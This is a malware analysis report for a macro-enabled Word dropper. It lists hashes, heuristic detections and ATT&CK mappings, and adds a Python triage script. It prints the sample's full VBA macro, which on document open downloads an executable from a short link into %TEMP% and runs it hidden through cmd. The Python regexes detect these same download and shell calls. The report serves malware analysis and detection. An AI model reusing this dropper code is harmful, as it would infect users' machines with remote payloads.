Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 ecaa7dd92961a11e…

MALICIOUS

Office (OOXML)

Size: 98.7 KB
Created: 2015-01-22 18:27:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2015-05-07
MD5: 22ab4130e32edb89b9b9481a64f99bbf
SHA-1: c73c22cb76a972367d337236ccbdb8b7c8ed6a3f
SHA-256: ecaa7dd92961a11efbb17b65c4b7c919d63d8ec2c9bb7019e786b70c1f03b456
Risk Score: 298

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1105 Ingress Tool Transfer

The sample is an OOXML Word document carrying a VBA project (word/vbaProject.bin). The document body tells the user to enable content "for security reasons", the standard lure for getting a macro past Office's default macros-disabled setting. The AutoOpen macro declares URLDownloadToFile from urlmon.dll (with a PtrSafe variant under #If VBA7 so it runs on both 32-bit and 64-bit Office), downloads http://bit.do/elo21april into %TEMP%\somm.exe, and then launches that file through Shell "cmd /k <path>" with window style vbHide, so no console is shown to the user. This is download-and-execute (dropper) behaviour: the payload is not embedded in the document, so what actually ran depends on what the short link resolved to at the time, and the link is the primary network indicator.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6368968-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6368968-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
       Shell "cmd /k """ & strFile & """", strWndStyle
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        URLDownloadToFile 0, "http://bit.do/elo21april", Environ("TEMP") & "\somm.exe", 0, 0
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://bit.do/elo21april (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    The schemas.openxmlformats.org and schemas.microsoft.com entries are XML namespace URIs that occur in every Word OOXML package and are not network indicators. The only actionable URL is http://bit.do/elo21april, the URL-shortener link the macro downloads from.
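The following is an added example, not the analysis platform's code and not code from the sample. It reproduces in plain Python the container-level heuristics listed above (OOXML_VBA, SE_ENABLE_LURE) and the macro-source heuristics (OLE_VBA_DOWNLOAD, OLE_VBA_SHELL, OLE_VBA_AUTOOPEN, OLE_VBA_ENVIRON, EMBEDDED_URL), then correlates download and execute into the dropper verdict stated in the summary. The .docx it builds is constructed in memory (the lure sentence and the vbaProject.bin placeholder are assumptions); the VBA source it scans is taken, abridged, from the macros.bas artifact extracted from this sample. Decompressing a real vbaProject.bin is left to olevba, as in the report.

```python
"""Triage an OOXML document for the indicators this report flags (added example).

Container layer: VBA project part / content type in the zip, "enable content"
lure in the body text.  Source layer (VBA text as olevba extracts it): download
and execute primitives, auto-run entry point, Environ(), URLs, drop path.
"""
import io
import json
import re
import zipfile

VBA_CT = "application/vnd.ms-office.vbaProject"
LURE_RE = re.compile(r"enable\s+(content|macros?|editing)", re.I)
URL_RE = re.compile(r'https?://[^\s"\'<>)]+')
DROP_RE = re.compile(r'Environ\(\s*"(\w+)"\s*\)\s*&\s*"([^"]+)"')  # Environ("TEMP") & "\x.exe"

# heuristic id -> (pattern over VBA source, severity, ATT&CK technique or None)
VBA_RULES = {
    "OLE_VBA_AUTOOPEN": (re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+(?:AutoOpen|Document_Open|AutoExec)\b",
                                    re.I | re.M), "low", "T1204.002"),
    "OLE_VBA_DOWNLOAD": (re.compile(r"\bURLDownloadToFile\w*", re.I), "critical", "T1105"),
    "OLE_VBA_SHELL": (re.compile(r'\bShell\s*[("]', re.I), "critical", "T1059.005"),
    "OLE_VBA_ENVIRON": (re.compile(r"\bEnviron\s*\(", re.I), "low", None),
}

# Abridged from the macros.bas artifact extracted from this sample.
MACRO_SOURCE = r'''
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If
Sub AutoOpen()
    URLDownloadToFile 0, "http://bit.do/elo21april", Environ("TEMP") & "\somm.exe", 0, 0
    Dim i
    i = RunFile(Environ("TEMP") & "\somm.exe", vbHide)
End Sub
Function RunFile(strFile As String, strWndStyle As String)
   Shell "cmd /k """ & strFile & """", strWndStyle
End Function
'''

# Constructed package parts (assumption); the lure wording follows the report's description.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
    f'<Override PartName="/word/vbaProject.bin" ContentType="{VBA_CT}"/></Types>')
DOCUMENT_XML = (
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body>'
    '<w:p><w:r><w:t>This document is protected. For security reasons, please click '
    'Enable Content to view it.</w:t></w:r></w:p></w:body></w:document>')


def build_sample_docx():
    """Constructed macro-enabled document; vbaProject.bin is an OLE-signature placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("word/document.xml", DOCUMENT_XML)
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 504)
    return buf.getvalue()


def scan_container(docx_bytes):
    """OOXML_VBA and SE_ENABLE_LURE: look at the zip, not at the macro code."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = zf.namelist()
        ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace")
        vba_parts = [n for n in names if n.lower().endswith("vbaproject.bin")]
        lure = False
        for n in names:
            if n.startswith("word/") and n.endswith(".xml"):
                text = re.sub(r"<[^>]+>", " ", zf.read(n).decode("utf-8", "replace"))
                lure = lure or LURE_RE.search(text) is not None
    return {"vba_parts": vba_parts, "vba_content_type": VBA_CT in ctypes, "enable_lure": lure}


def scan_vba(source):
    """OLE_VBA_* heuristics plus URL and drop-path extraction over VBA source text."""
    lines, findings = source.splitlines(), []
    for hid, (rx, severity, technique) in VBA_RULES.items():
        m = rx.search(source)
        if m:
            lineno = source.count("\n", 0, m.start()) + 1
            findings.append({"id": hid, "severity": severity, "attack": technique,
                             "line": lineno, "match": lines[lineno - 1].strip()})
    urls = list(dict.fromkeys(URL_RE.findall(source)))
    drops = list(dict.fromkeys(f"%{var.upper()}%{path}" for var, path in DROP_RE.findall(source)))
    return {"findings": findings, "urls": urls, "drop_paths": drops}


def triage(docx_bytes, vba_source):
    container, vba = scan_container(docx_bytes), scan_vba(vba_source)
    ids = {f["id"] for f in vba["findings"]}
    # The dropper verdict rests on download and execute appearing together with a URL.
    dropper = {"OLE_VBA_DOWNLOAD", "OLE_VBA_SHELL"} <= ids and bool(vba["urls"])
    return {"container": container, "vba": vba, "dropper_pattern": dropper}


if __name__ == "__main__":
    print(json.dumps(triage(build_sample_docx(), MACRO_SOURCE), indent=2))
```

On a real file, pass the bytes of the suspicious document and the text olevba printed for it; the drop path comes out as %TEMP%\somm.exe, which is the form to hand to endpoint telemetry, since the literal path differs per user.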

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1260 bytes
SHA-256: 77171a431fbe07f828fea3d98d40307847bcea18a9317e93704cf1752e1e2e90
Preview of the extracted script (macros.bas):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
    
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" _
        (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Sub AutoOpen()
    URLDownloadToFile 0, "http://bit.do/elo21april", Environ("TEMP") & "\somm.exe", 0, 0
    Dim strPath As String
    strPath = Environ("TEMP") & "\somm.exe"
    'MsgBox (strPath)
    Dim i
    i = RunFile(Environ("TEMP") & "\somm.exe", vbHide)
End Sub

Function RunFile(strFile As String, strWndStyle As String)
   Shell "cmd /k """ & strFile & """", strWndStyle
   On Error Resume Next
   Exit Function
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 9216 bytes
SHA-256: f7f2ea3a113fced07aaf8d1aca1a4881f1b2d7881543e3a88d32bb455905a047
Detection
ClamAV: Doc.Dropper.Agent-6368968-0
Obfuscation or payload: unlikely